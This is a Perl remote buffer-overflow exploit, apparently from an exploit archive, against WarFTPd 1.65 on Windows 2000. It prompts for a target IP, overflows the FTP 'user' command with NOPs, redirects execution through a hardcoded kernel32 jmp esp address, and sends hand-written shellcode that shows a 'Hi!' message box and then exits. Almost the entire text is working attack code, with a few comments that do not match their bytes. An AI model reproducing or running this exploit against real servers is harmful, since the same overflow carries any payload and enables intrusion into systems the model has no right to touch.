WarFTPd v1.65 for Win2k remote buffer overflow exploit in win32 perl. Included shellcode pops up a message box.
4d51ac1438509a6db6d42e889b5f2204a336e230d13d61319f50f9395026bad2
use IO::Socket;
$port=21;
$|=1;
#Kernel32 jmp esp 7754a3ab
#Kernel32 MessageBoxA 77e375d5
#MSVCRT c_exit 78003985
print "\tRemote Buffer overflow of user in WarFTPd 1.65 for Win2k\n\n\tBy kago\@kago.ca\n\n";
print "\tEnter The Target IP :";
$ip = <STDIN>;
chomp $ip;
$host = inet_aton($ip);
$ServerAddr = sockaddr_in($port, $host);
$protocol_name = "tcp";
socket(CLIENT, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
select(CLIENT); $|=1; select(STDOUT);
if(connect(CLIENT, $ServerAddr)) {
send(CLIENT,"user ",0);
send(CLIENT,"\x90"x485,0); #485 nops to overwrite EIP
send(CLIENT,"\xab\xa3\x54\x77",0); #Overwriting EIP with "jmp,esp" address via Kernel32.dll
send(CLIENT,"\x90"x5,0); #some NOPs for padding- the "call,esp" steps to the last nop at 0098fd9c
send(CLIENT,"\x55",0); #push ebp - starting something new
send(CLIENT,"\x8b\xec",0); #mov ebp,esp
send(CLIENT,"\x33\xff",0); #xor edi,edi - edi = 0
send(CLIENT,"\x57",0); #push edi
send(CLIENT,"\xc6\x45\xfc\x48",0); #mov byte ptr [ebp-0x4],0x6f - H
send(CLIENT,"\xc6\x45\xfd\x69",0); #mov byte ptr [ebp-0x3],0x78 - i
send(CLIENT,"\xc6\x45\xfe\x21",0); #mov byte ptr [ebp-0x2],0x21 - !
send(CLIENT,"\xba\xd5\x75\xe3\x77",0); #mov edx, 0x77e375d5 - MessageBoxA to edx
send(CLIENT,"\x52",0); #push edx
send(CLIENT,"\x57",0); #push edi
send(CLIENT,"\x8d\x55\xfc",0); #lea edx,[ebp-0x4] - move Hi! to edx
send(CLIENT,"\x52",0); #push edx
send(CLIENT,"\x52",0); #push edx
send(CLIENT,"\x52",0); #push edx
send(CLIENT,"\x57",0); #push edi
send(CLIENT,"\xff\x55\xf8",0); #call dword ptr [ebp-0x8]
send(CLIENT,"\x55",0); #push ebp - Start the exit stuff so we don't crash
send(CLIENT,"\x8b\xec",0); #move ebp,esp
send(CLIENT,"\xba\x86\x41\x01\x89",0); #mov edx, 0x89014186 - To exit we need to call exit at 78003985 from MSVCRT but we can't use Nulls
send(CLIENT,"\x81\xea\x01\x08\x01\x11",0); #sub edx, 0x11010201 - My leet-o way to get to the address with the null
send(CLIENT,"\x52",0); #push edx
send(CLIENT,"\x33\xc0",0); #xor eax,eax
send(CLIENT,"\x50",0); #push eax
send(CLIENT,"\xff\x55\xfc",0); #call dword ptr [ebp-0x4]
send(CLIENT,"\n",0);
close(CLIENT);
}